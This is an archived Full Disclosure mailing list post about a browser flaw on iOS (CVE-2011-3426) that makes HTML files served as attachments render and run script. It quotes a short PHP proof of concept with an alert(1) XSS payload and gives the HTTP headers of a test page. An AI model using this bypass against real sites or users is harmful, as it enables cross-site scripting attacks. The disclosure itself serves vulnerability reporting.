Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Bypassing Content-Disposition: attachment for XSS on Chrome/Safari(IOS 6.x)

From: "Securify B.V." <lists () securify nl>
Date: Wed, 30 Jul 2014 19:01:28 +0200
This issue was originally reported as CVE-2011-3426. We can confirm that Mobile Safari on iOS 7.1.2 is still affected. We've reported this to Apple on February 25, 2014. You can test is yourself at: 
http://www.securify.nl/cve-2011-3426.html

This test page sets the following HTTP headers:

Content-Disposition: attachment;filename=cve-2011-3426.html
Content-Type: application/octet-stream

With kind regards,

Yorick


On di, 2014-07-29 at 15:56 +0800, heige wrote:
>
> > > Bypassing Content-Disposition: attachment for XSS on Chrome/Safari(IOS) 
> > >
> > > by Superhei of KnownSec team (www.knownsec.com) 2013.6.3
> > >
> > > Test Environment
> > > ipad(ios 6.1.3)
> > > Chrome(26.0.1410.53)
> > >
> > > This code is downloader for attachment which is a HTML file.
> > >
> > > <?php
> > > //down.php
> > > header("Content-Type:text/plain");
> > > //header("Content-Type:text/html");
> > > header("Content-Disposition: attachment; filename=\"test.html\"");
> > > echo "<html><script>alert(1)</script></html>";
> > > ?>
> > >
> > > On IOS , when Chrome/Safari visit the down.php, the HTML code will be running.Ofcourse, including the javascript and led to cross-site scripting attacks. 
> > >
> >
> from http://www.80vul.com/apple.txt

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: